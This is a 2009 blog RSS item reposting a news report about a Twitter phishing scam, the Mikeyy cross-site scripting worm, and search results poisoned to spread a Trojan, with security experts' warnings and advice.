		<title>Twitter under attack of spammers</title>
		<link>http://openhippo.com/twitter-under-attack-of-spammers/</link>
		<comments>http://openhippo.com/twitter-under-attack-of-spammers/#comments</comments>
		<pubDate>Mon, 20 Apr 2009 12:10:27 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[twitter hackers]]></category>
		<category><![CDATA[twitter spammers]]></category>
		<category><![CDATA[twitter virus]]></category>
		<category><![CDATA[twitter worm]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=587</guid>
		<description><![CDATA[Scammers taking advantage of heightened publicÂ  interest to spread malware. Today saw a new scam affecting users of the popular Twitter micro-blogging site, while security experts reported that hackers are taking advantage of heightened public interest in Twitter-related security issues to spread malware. The latest Twitter problems appear to be a new raft of messages [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="size-full wp-image-588 aligncenter" title="twitter" src="http://openhippo.com/wp-content/uploads/2009/04/twitter.jpg" alt="twitter" width="213" height="127" /></p>
<p style="text-align: center;">Scammers taking advantage of heightened publicÂ  interest to spread malware.</p>
<p>Today saw a new scam affecting users of the popular Twitter micro-blogging site, while security experts reported that hackers are taking advantage of heightened public interest in Twitter-related security issues to spread malware.</p>
<p>The latest Twitter problems appear to be a new raft of messages being posted to the Twitter feeds of users containing the words and link, &#8220;You&#8217;ll like this one! Check out www.TheSmartEcard.com&#8221;, or &#8220;Retweet: You&#8217;ll love this one! Check out www.TheSmartEcard.com&#8221;.<br />
Advertisement</p>
<p>According to Twitter, the problem is a &#8220;scam/phishing site&#8221; rather than something more malicious. Graham Cluley, senior technology consultant at security vendor Sophos, warned users to avoid clicking on the link.</p>
<p>&#8220;Hopefully, it should be obvious from the web site&#8217;s opening page of legalese banning staff from Twitter, MySpace, Facebook, Microsoft and Google, that something odd is afoot &#8211; even before it starts to quiz you for personal information,&#8221; he wrote in his blog.</p>
<p>&#8220;But if not, let me just say that visiting the web site is not recommended.&#8221;</p>
<p>The scam follows hot on the heels of more worm attacks over the past few days. On Friday it emerged that a new version of the Mikeyy cross-site scripting worm was trying to spread across the network.</p>
<p>The author sent messages to celebrity users such as Ashton Kutcher and Oprah Winfrey, with the intention of spreading the worm more quickly, as these profiles have large numbers of followers.</p>
<p>&#8220;If you suspect you have been affected, clean out your Twitter profile and settings of any content that you did not add yourself, and &#8211; although it may not be the case that it has been compromised &#8211; consider using a more secure password,&#8221; wrote Cluley.</p>
<p>Then over the weekend, another version of the worm appeared to be infecting profiles with messages including jokes, purportedly authored by the same hacker, Mikeyy.</p>
<p>Some experts have argued that Twitter has looked amateurish and unprepared in its response to the flurry of attacks, but the site&#8217;s administrators noted the attacks were both short lived and dealt with appropriately.</p>
<p>&#8220;Still, we suggest that you avoid viewing the profiles of users posting uncharacteristic or otherwise suspicious tweets,&#8221; wrote the firm on its status page.</p>
<p>Anti-malware firm Trend Micro, meanwhile, has noted that hackers are using public interest and the high level of media coverage of the worm attacks on Twitter to spread more malware. Google searches for &#8216;Twitter worm&#8217; and &#8216;Mikeyy&#8217; bring back malicious URL links on the first page of results, according to a blog posting by Trend AV engineer Jasper Manuel.</p>
<p>Visiting the site will trigger the download of a Trojan onto the user&#8217;s PC, he said, although the firm&#8217;s engineers are still trying to verify if the Trojan can download other malware too.</p>
<p>Source From :- <a href="httphttp://www.vnunet.com/vnunet/news/2240657/twitter-under-attack-again" target="_blank">www.vnunet.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/twitter-under-attack-of-spammers/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

